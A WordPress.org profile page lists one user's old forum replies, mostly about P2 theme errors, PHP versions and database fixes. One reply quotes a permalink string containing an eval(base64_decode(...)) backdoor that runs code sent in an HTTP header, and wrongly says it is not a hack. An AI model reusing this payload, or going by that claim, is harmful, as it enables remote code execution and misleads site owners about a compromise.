Title: warebloke's Replies | WordPress.org

---

# warebloke

  [  ](https://wordpress.org/support/users/warebloke/)

 *   [Profile](https://wordpress.org/support/users/warebloke/)
 *   [Topics Started](https://wordpress.org/support/users/warebloke/topics/)
 *   [Replies Created](https://wordpress.org/support/users/warebloke/replies/)
 *   [Reviews Written](https://wordpress.org/support/users/warebloke/reviews/)
 *   [Topics Replied To](https://wordpress.org/support/users/warebloke/replied-to/)
 *   [Engagements](https://wordpress.org/support/users/warebloke/engagements/)
 *   [Favorites](https://wordpress.org/support/users/warebloke/favorites/)

 Search replies:

## Forum Replies Created

Viewing 12 replies - 1 through 12 (of 12 total)

 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [Disable a custom field](https://wordpress.org/support/topic/disable-a-custom-field/)
 *  Thread Starter [warebloke](https://wordpress.org/support/users/warebloke/)
 * (@warebloke)
 * [15 years, 11 months ago](https://wordpress.org/support/topic/disable-a-custom-field/#post-1590355)
 * the current theme is Puretype and is using it to display the old thumbnails actually
   within posts whereas the previous theme was revolution magazine which only used
   the thumbnails to display on the homepage.
 * we just want to shut off the display of any custom field thumbnail prior to post
   id 22486 – is that possible?
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [P2 theme showing Deprecated error since updating from PHP 5.2 to PHP 5.3](https://wordpress.org/support/topic/p2-theme-showing-deprecated-error-since-updating-from-php-52-to-php-53/)
 *  Thread Starter [warebloke](https://wordpress.org/support/users/warebloke/)
 * (@warebloke)
 * [16 years, 4 months ago](https://wordpress.org/support/topic/p2-theme-showing-deprecated-error-since-updating-from-php-52-to-php-53/#post-1362676)
 * fixed it, was not on latest WP
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Saving Code in sidebar widget adds “\” everywhere](https://wordpress.org/support/topic/saving-code-in-sidebar-widget-adds-everywhere/)
 *  Thread Starter [warebloke](https://wordpress.org/support/users/warebloke/)
 * (@warebloke)
 * [16 years, 7 months ago](https://wordpress.org/support/topic/saving-code-in-sidebar-widget-adds-everywhere/#post-1280521)
 * Has no-one else had this trouble, looks like a magic quotes issue but can not
   seem to fix it..
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Saving Code in sidebar widget adds “\” everywhere](https://wordpress.org/support/topic/saving-code-in-sidebar-widget-adds-everywhere/)
 *  Thread Starter [warebloke](https://wordpress.org/support/users/warebloke/)
 * (@warebloke)
 * [16 years, 7 months ago](https://wordpress.org/support/topic/saving-code-in-sidebar-widget-adds-everywhere/#post-1280299)
 * I have deactivated all plugins and still have the same problem, anyone offer 
   any advice?
 * Tks
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Image URL not correct](https://wordpress.org/support/topic/image-url-not-correct/)
 *  Thread Starter [warebloke](https://wordpress.org/support/users/warebloke/)
 * (@warebloke)
 * [16 years, 9 months ago](https://wordpress.org/support/topic/image-url-not-correct/#post-1220670)
 * Ok I fixed it crudely, simply moved the storage folder of images – and named 
   and placed it where it was being looked for.
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [None of my users are found](https://wordpress.org/support/topic/none-of-my-users-are-found/)
 *  Thread Starter [warebloke](https://wordpress.org/support/users/warebloke/)
 * (@warebloke)
 * [16 years, 9 months ago](https://wordpress.org/support/topic/none-of-my-users-are-found/#post-1220605)
 * I found the issue – thanks for asking. It was a database error within phpmyadmin,
   it created a new db for some bizarre reason and left all users on wp_ yet created
   a new db wp_1_ with no users, renamed the files all working fine! wew
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [WP adding code to the end of url links breaking them](https://wordpress.org/support/topic/wp-adding-code-to-the-end-of-url-links-breaking-them/)
 *  [warebloke](https://wordpress.org/support/users/warebloke/)
 * (@warebloke)
 * [16 years, 10 months ago](https://wordpress.org/support/topic/wp-adding-code-to-the-end-of-url-links-breaking-them/#post-1168180)
 * This just started to happen on our site today too
 * /%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%/
 * Is not a hack as is not affecting all Urls.
 * Anyone else have the same problem?
 *   Forum: [Themes and Templates](https://wordpress.org/support/forum/themes-and-templates/)
   
   In reply to: [P2 Theme with a fatal error – worked initially ok?](https://wordpress.org/support/topic/p2-theme-with-a-fatal-error-worked-initially-ok/)
 *  Thread Starter [warebloke](https://wordpress.org/support/users/warebloke/)
 * (@warebloke)
 * [17 years, 1 month ago](https://wordpress.org/support/topic/p2-theme-with-a-fatal-error-worked-initially-ok/#post-1077063)
 * I managed to fix this by simply changing the PHP version from 4 to 5. It seems
   version 4 does not work with P2.
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Fatal Error in P2 – line 352](https://wordpress.org/support/topic/fatal-error-in-p2-line-352/)
 *  Thread Starter [warebloke](https://wordpress.org/support/users/warebloke/)
 * (@warebloke)
 * [17 years, 1 month ago](https://wordpress.org/support/topic/fatal-error-in-p2-line-352/#post-1077062)
 * It was using PHP 4 on Media Temple, changed it to PHP 5 and hey presto works!
 * Thanks
 *   Forum: [Themes and Templates](https://wordpress.org/support/forum/themes-and-templates/)
   
   In reply to: [P2 Theme with a fatal error – worked initially ok?](https://wordpress.org/support/topic/p2-theme-with-a-fatal-error-worked-initially-ok/)
 *  Thread Starter [warebloke](https://wordpress.org/support/users/warebloke/)
 * (@warebloke)
 * [17 years, 1 month ago](https://wordpress.org/support/topic/p2-theme-with-a-fatal-error-worked-initially-ok/#post-1077027)
 * It may also help to add that there are zero plugins on this theme
 *   Forum: [Themes and Templates](https://wordpress.org/support/forum/themes-and-templates/)
   
   In reply to: [P2 Theme with a fatal error – worked initially ok?](https://wordpress.org/support/topic/p2-theme-with-a-fatal-error-worked-initially-ok/)
 *  Thread Starter [warebloke](https://wordpress.org/support/users/warebloke/)
 * (@warebloke)
 * [17 years, 1 month ago](https://wordpress.org/support/topic/p2-theme-with-a-fatal-error-worked-initially-ok/#post-1076986)
 * This is still not solved guys, thanks
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Fatal Error in P2 – line 352](https://wordpress.org/support/topic/fatal-error-in-p2-line-352/)
 *  Thread Starter [warebloke](https://wordpress.org/support/users/warebloke/)
 * (@warebloke)
 * [17 years, 1 month ago](https://wordpress.org/support/topic/fatal-error-in-p2-line-352/#post-1076938)
 * I just re-installed WP to check if that was the problem, but nothing changed.
   Any thoughts?

Viewing 12 replies - 1 through 12 (of 12 total)